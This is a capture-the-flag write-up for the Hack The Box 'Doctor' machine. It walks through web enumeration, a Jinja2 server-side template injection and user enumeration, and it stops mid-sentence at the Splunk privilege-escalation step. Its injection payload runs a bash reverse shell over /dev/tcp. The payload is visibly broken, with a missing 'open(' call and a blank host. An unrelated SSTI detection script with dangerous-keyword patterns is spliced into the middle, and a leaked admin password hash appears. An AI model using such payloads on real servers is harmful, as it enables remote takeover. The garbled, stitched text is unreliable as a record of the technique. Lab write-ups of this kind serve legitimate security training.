HTB Doctor

Writeup for Doctor box on

Initial enumeration

Found ports 22, 80 and 8089 open on the box.

While browsing the IP we discover the hostname doctors.htb. After resolving this hostname locally and accessing the page we find a new portal:

After registering an account we discover we can post messages. Inspecting the source code of the page we also find an /archive page which seems to be under development; however, if we post a new message, its title appears in the XML feed.

Since this is a Python application it is worth checking for SSTI (server-side template injection).

The first payload we can try is a simple {{ 4 * 4 }}, which will be rendered as 16 in the title if the injection works. This works as expected and we can proceed to a more complex payload:

title={{"/var/tmp/cccc2.cfg", "w").write("from subprocess import check_output\n\nRUNCMD = check_output\n") }}{{ config.from_pyfile("/var/tmp/cccc2.cfg") }}{{ config["RUNCMD"]("/bin/bash -c '/bin/bash -i >%26 /dev/tcp/ 0>%261'",shell=True) }}&content=a&submit=Post
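As an added example (not part of the original writeup), a small Python triage routine for the weakness above: it decodes a form body of the same shape as the payload (title=...&content=a&submit=Post), looks for Jinja2 delimiters in the title, and raises the severity when the expression reaches for application or OS names such as config, from_pyfile or subprocess. Flask/Jinja2 is assumed; the sample bodies are constructed, not captured traffic.

```python
import re
from urllib.parse import parse_qs

# Jinja2 delimiters: {{ expr }}, {% stmt %}, {# comment #}
TEMPLATE_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}|\{#.*?#\}", re.S)
# Names that let a template expression reach into the app or the OS.
# Drawn from the building blocks of the payload above plus the usual
# object-walk gadgets; extend the list for your own stack.
DANGEROUS_RE = re.compile(
    r"\b(config|from_pyfile|from_object|subprocess|check_output|os|popen|"
    r"import|__class__|__globals__|__subclasses__|__builtins__)\b"
)

def assess_title(title: str) -> dict:
    """Classify one post title: clean / suspicious / high, plus the
    template fragments that triggered the verdict."""
    fragments = TEMPLATE_RE.findall(title)
    if not fragments:
        return {"severity": "clean", "fragments": []}
    if any(DANGEROUS_RE.search(f) for f in fragments):
        return {"severity": "high", "fragments": fragments}
    # Template syntax in user input, but nothing dangerous named yet
    # (e.g. the {{ 4 * 4 }} probe).
    return {"severity": "suspicious", "fragments": fragments}

def assess_form_body(body: str) -> dict:
    """Decode a urlencoded POST body (title=...&content=...&submit=Post)
    and assess the title field. A missing title is treated as clean."""
    fields = parse_qs(body, keep_blank_values=True)
    title = fields.get("title", [""])[0]
    result = assess_title(title)
    result["title"] = title
    return result

# Constructed sample bodies (hypothetical, not from the box).
SAMPLE_BODIES = [
    "title=Hello+world&content=a&submit=Post",
    "title=%7B%7B+4+*+4+%7D%7D&content=a&submit=Post",
    "title=%7B%7B+config.items()+%7D%7D&content=a&submit=Post",
]

def triage(bodies=SAMPLE_BODIES) -> list:
    """Assess every body and return the verdicts in order."""
    return [assess_form_body(b) for b in bodies]

if __name__ == "__main__":
    for r in triage():
        print(f"{r['severity']:<10} {r['title']!r}")
```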

User enumeration

We are the user web:

web@doctor:~$ id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)

Running LinPEAS

 --> Found interesting column names in user (output limit 10)
        id INTEGER NOT NULL,
        username VARCHAR(20) NOT NULL,
        email VARCHAR(120) NOT NULL,
        image_file VARCHAR(20) NOT NULL,
        password VARCHAR(60) NOT NULL,
        PRIMARY KEY (id),
        UNIQUE (username),
        UNIQUE (email)
1, admin, [email protected], default.gif, $2b$12$Tg2b8u/elwAyfQOvqvxJgOTcsbnkFANIDdv6jVXmxiWsg4IznjI0S

In /var/log/apache2 there is a backup file where we can see something strange:

The string found in the backup works as the password for the user shaun, including for sudo.

Privilege escalation

Splunkd app command execution exploit

Using the exploit from